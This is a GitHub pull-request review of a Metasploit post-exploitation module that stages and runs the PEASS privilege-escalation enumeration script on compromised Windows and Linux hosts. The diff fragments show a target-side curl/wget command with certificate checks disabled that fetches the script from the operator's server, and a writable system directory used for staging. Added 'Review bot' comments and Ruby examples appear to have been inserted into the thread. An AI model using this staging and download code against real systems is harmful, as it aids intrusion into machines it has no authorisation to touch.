Add post/multi/gather/peass #20208
Conversation
Based upon discussion in peass-ng/PEASS-ng#465 and the Metasploit Slack, this module is now BSD licensed and may be eligible for inclusion.
) | ||
register_options( | ||
[ | ||
OptString.new('WINPEASS', [true, 'Which PEASS script to use. Use True for WinPeass and false for LinPEASS', true]), |
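Review bot: WINPEASS is declared as an OptString but its default is the Ruby boolean true, and the description asks the user to type True/false; once set from the console the value is the string "false", so any comparison against true/false will silently mis-select the script. An enumeration as suggested (for example an OptEnum named PEASS with the values winpeas and linpeas) removes both the type mismatch and the need to explain the encoding in the description.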
This should be an enumeration rather than a boolean.
modules/post/multi/gather/peass.rb
Outdated
[ | ||
OptString.new('WINPEASS', [true, 'Which PEASS script to use. Use True for WinPeass and false for LinPEASS', true]), | ||
OptString.new('CUSTOM_URL', [false, 'URL to download the PEASS script from (if not using the default one). Accepts http(s) or absolute path. Overrides the WINPEASS variable', '']), | ||
OptString.new('PASSWORD', [false, 'Password to encrypt and obfuscate the script (randomly generated). The length must be 32B. If no password is set, only base64 will be used.', rand(36**32).to_s(36)]), |
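Review bot: the PASSWORD default rand(36**32).to_s(36) does not satisfy the description's "length must be 32B": the integer is drawn below 36**32 and Integer#to_s(36) drops leading zero digits, so about one draw in 36 is shorter than 32 characters, and Kernel#rand is not a cryptographic generator. Use Rex::Text.rand_text_alphanumeric(32) for the default and validate the length of operator-supplied values before use. CUSTOM_URL also accepts plain http, so a script fetched that way can be replaced on the wire; if the option stays, the description should say so.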
Does this need to be configurable by the user in the first place?
I'm open to removing it, just wanted to get the conversation started with a Rubocop-passing variant of the original module.
else | ||
# If no Windows, check if base64 exists | ||
if !session.platform.include?('win') | ||
base64_path = cmd_exec('command -v base64') |
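Review bot: the platform test at the top of this else branch is redundant if the enclosing if already branched on 'win', in which case the inner condition is always true and can be dropped. base64_path holds whatever cmd_exec printed, so the check that follows should test for an empty result rather than for a substring; the framework's command_exists? helper (Msf::Post::Common) wraps exactly this probe and returns a boolean. Given the openssl enc -d -A -base64 alternative raised below, probing for base64 first and falling back to openssl covers more targets than assuming either one.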
You can use openssl enc -d -A -base64 instead.
Is openssl more commonly installed than base64? If so, I'm open to it.
modules/post/multi/gather/peass.rb
Outdated
OptString.new('TEMP_DIR', [false, 'Path to upload the obfuscated PEASS script inside the compromised machine. By default "C:\Windows\System32\spool\drivers\color" is used in Windows and "/tmp" in Unix.', '']), | ||
OptString.new('PARAMETERS', [false, 'Parameters to pass to the script', nil]), | ||
OptString.new('TIMEOUT', [false, 'Timeout of the execution of the PEASS script (15min by default)', 15 * 60]), | ||
OptString.new('SRVHOST', [false, 'Set your metasploit instance IP if you want to download the PEASS script from here via http(s) instead of uploading it.', '']), | ||
OptString.new('SRVPORT', [false, 'Port to download the PEASS script from using http(s) (only used if SRVHOST)', 443]), | ||
OptString.new('SSL', [false, 'Indicate if you want to communicate with https (only used if SRVHOST)', true]), | ||
OptString.new('URIPATH', [false, 'URI path to download the script from there (only used if SRVHOST)', '/' + rand(36**4).to_s(36) + '.txt']) |
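Review bot: several of these options carry the wrong type: TIMEOUT (default 15 * 60) should be an OptInt, SRVPORT (443) an OptPort, SSL (true) an OptBool, and PARAMETERS should not default to nil on an OptString. With OptString every value arrives as a string and each numeric or boolean comparison has to parse it by hand. SRVHOST, SRVPORT, SSL and URIPATH are also the names the HttpServer mixin registers; if that mixin ends up serving the script, drop these duplicates and rely on the mixin's own options, otherwise the empty-string SRVHOST sentinel used later collides with the mixin's 0.0.0.0 default.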
I think™ that metasploit has some utilities/functions to upload'n'execute scripts/binaries. Summoning @zeroSteiner!
We do, yes, and that's probably how I'd write it, where the code is sent directly from Metasploit over the Meterpreter C&C channel rather than fetched out of band via HTTP. However, that'd realistically require us to have the binary within our source tree like we do SharpHound / BloodHound. The catch there is the license changes would have to also be applied to that code as well for us to distribute. If we're not modifying the binary, I think we'll be compatible with additional licenses.
That approach would have the downside of some one-time license research but would likely be both easier for the operator, since they'll have fewer options to tinker with and connections to debug, and, I'd argue, more secure in the case of Meterpreter comms.
The rand(36**7).to_s(36) code pattern is used throughout to generate random strings. Using Rex::Text.rand_text_alphanumeric(7) is preferred. Or, if lowercase is required: Rex::Text.rand_text_alphanumeric(7).downcase.
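An added Ruby example, not code from the PR or from PEASS-ng, illustrating the point raised in this comment and the PASSWORD default earlier in the diff: rand(36**n).to_s(36) does not yield a fixed-length string, and Kernel#rand is not a cryptographic generator. SecureRandom.alphanumeric stands in for Rex::Text.rand_text_alphanumeric so the snippet runs outside the framework; the rng parameter and the seed are assumptions added for reproducibility.

```ruby
require 'securerandom'

# Added example (not the module's code). rand(36**n) draws an integer in
# 0...36**n and Integer#to_s(36) drops leading zero digits, so the token is
# anywhere from 1 to n characters long. Kernel#rand / Random are PRNGs, not
# CSPRNGs, so the result is also unsuitable as an encryption password.

# Token built the way the original module builds it. `rng` is injected only
# so the behaviour can be reproduced with a fixed seed (assumption).
def legacy_token(n, rng = Random.new)
  rng.rand(36**n).to_s(36)
end

# How many of `samples` legacy tokens of nominal length n come out shorter
# than n. Roughly 1 in 36 draws loses at least one leading digit.
def short_token_count(n, samples, seed)
  rng = Random.new(seed)
  samples.times.count { legacy_token(n, rng).length < n }
end

# Fixed-length alternative from the standard library; inside the framework
# Rex::Text.rand_text_alphanumeric(n) is the equivalent. Always n characters,
# drawn from the OS CSPRNG.
def fixed_token(n)
  SecureRandom.alphanumeric(n)
end

if __FILE__ == $PROGRAM_NAME
  short = short_token_count(32, 10_000, 1234)
  puts "legacy 32-char tokens shorter than 32 in 10,000 draws: #{short}"
  puts "fixed-length token: #{fixed_token(32)}"
end
```

The count printed for the legacy pattern is never zero over a few thousand draws, which is the concrete reason the "length must be 32B" promise in the PASSWORD description cannot be kept with that default.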
Co-authored-by: Julien Voisin <[email protected]>
Co-authored-by: bcoles <[email protected]>
Updated, thank you.
@@ -0,0 +1,396 @@ | |||
# Copyright (c) 2025, PEASS-ng owners |
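Review bot: a third-party copyright header at the top of a module needs the matching 'License' => BSD_LICENSE in the module's info hash so the framework reports the same license the file claims, together with the external-licenses entry requested below; the standard Metasploit header that every module carries should stay as well, so the framework license and the PEASS-ng license remain distinguishable.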
Could we add this license to the external license file please? @bwatters-r7
end | ||
|
||
elsif session.platform.include?('win') | ||
temp_path = "C:\\Windows\\System32\\spool\\drivers\\color\\#{temp_peass_name}" |
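Review bot: hard-coding C:\Windows\System32\spool\drivers\color ignores the TEMP_DIR option registered earlier and assumes the default system drive; build the path from an environment variable (get_env('WINDIR') as suggested, or get_env('TEMP')) and honour TEMP_DIR when the operator sets it. The colour-profile directory is picked because unprivileged users can write to it, which is also why defenders watch it; the user's own TEMP is a less conspicuous default for a gather module.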
temp_path = "C:\\Windows\\System32\\spool\\drivers\\color\\#{temp_peass_name}" | |
temp_path = get_env('WINDIR') + "\\System32\\spool\\drivers\\color\\#{temp_peass_name}" |
Does this need to be system32?
OptString.new('SRVHOST', [false, 'Set your metasploit instance IP if you want to download the PEASS script from here via http(s) instead of uploading it.', '']), | ||
OptString.new('SRVPORT', [false, 'Port to download the PEASS script from using http(s) (only used if SRVHOST)', 443]), | ||
OptString.new('SSL', [false, 'Indicate if you want to communicate with https (only used if SRVHOST)', true]), | ||
OptString.new('URIPATH', [false, 'URI path to download the script from there (only used if SRVHOST)', '/' + Rex::Text.rand_text_alphanumeric(4) + '.txt']) |
Could we add a DeFanged mode OptBool here in order to instruct the user that they're about to run an external script that might have implications not necessarily included with Metasploit?
https://github.com/search?q=repo%3Arapid7%2Fmetasploit-framework%20DEFANG&type=code
cmd = "curl -k -s \"#{url_download_peass}\"" | ||
curl_path = cmd_exec('command -v curl') | ||
if !curl_path.include?('curl') | ||
cmd = "wget --no-check-certificate -q -O - \"#{url_download_peass}\"" |
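Review bot: both download paths disable certificate verification (curl -k, wget --no-check-certificate), so anyone on the network path can substitute the script the target is about to execute, and the SSL option defaulting to true buys nothing. Gate the insecure flags behind an option that defaults to verification on, as suggested, and note that a self-signed listener certificate will still fail verification unless the module delivers the certificate to the target or the session upload path is used instead. The curl_path.include?('curl') test is a substring match; checking for a non-empty absolute path (or command_exists?) is stricter, and the URL should be shell-escaped rather than wrapped in double quotes.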
Would we be able to make this a datastore option where checking certificates is the default? Maybe a generic option that covers security checks for all methods of downloading.
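An added Ruby example, not part of the PR, of how the target-side download command could be assembled so that certificate verification is on unless the operator opts out, as this comment asks. The helper names, the verify_tls keyword and the probe-based picker are assumptions; the flags are the ones the module already uses.

```ruby
require 'shellwords'

# Added example (not the module's code). Assembles the fetch command run on
# the target with TLS verification ON by default; the insecure flags only
# appear when verify_tls is explicitly false. The URL is shell-escaped with
# Shellwords instead of being interpolated inside double quotes, so a URL
# carrying quotes or metacharacters cannot break out of the argument.
def build_fetch_command(url, tool, verify_tls: true)
  target = Shellwords.escape(url)
  case tool
  when 'curl'
    flags = ['-s']
    flags << '-k' unless verify_tls               # operator opt-out only
    "curl #{flags.join(' ')} #{target}"
  when 'wget'
    flags = ['-q', '-O', '-']
    flags << '--no-check-certificate' unless verify_tls
    "wget #{flags.join(' ')} #{target}"
  else
    raise ArgumentError, "unsupported downloader: #{tool.inspect}"
  end
end

# Chooses the downloader from the output of `command -v curl` and
# `command -v wget` on the target (assumed to be passed in as strings). A
# present binary prints its absolute path; an absent one prints nothing.
# Requiring a leading '/' is stricter than the substring match on 'curl'
# used in the original, which would also fire on any diagnostic text that
# happened to contain the word.
def pick_downloader(curl_probe, wget_probe)
  return 'curl' if curl_probe.to_s.strip.start_with?('/')
  return 'wget' if wget_probe.to_s.strip.start_with?('/')
  nil
end

if __FILE__ == $PROGRAM_NAME
  # Constructed probe output, as a Meterpreter/shell session might return it.
  tool = pick_downloader("/usr/bin/curl\n", '')
  puts build_fetch_command('https://192.0.2.10:443/abcd.txt', tool)
  puts build_fetch_command('https://192.0.2.10:443/abcd.txt', tool, verify_tls: false)
end
```

With this shape the datastore option the comment proposes maps directly onto verify_tls, and the module never emits -k or --no-check-certificate unless that option is turned off.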
file.rewind | ||
@temp_file_path = file.path | ||
|
||
if datastore['SRVHOST'] == '' |
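Review bot: datastore['SRVHOST'] == '' relies on an empty-string sentinel; datastore['SRVHOST'].blank? also routes a nil or whitespace value to the upload branch, and the sentinel breaks outright if the HttpServer mixin's 0.0.0.0 default ever applies. Given the question below about uploading through the session, consider making the session upload the only path: it needs no listener, no outbound connection from the target and none of the TLS-verification trade-offs the HTTP path introduces.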
Is there a circumstance where uploading via https is preferable to simply uploading through the session?
I am not the author, merely a fan trying to ~~make two toys kiss~~ integrate PEASS without requiring users to add it themselves.

Verification
List the steps needed to make sure this thing works
- msfconsole
- use post/multi/gather/peass
- set WINPEASS false (if running against a Linux target)
- run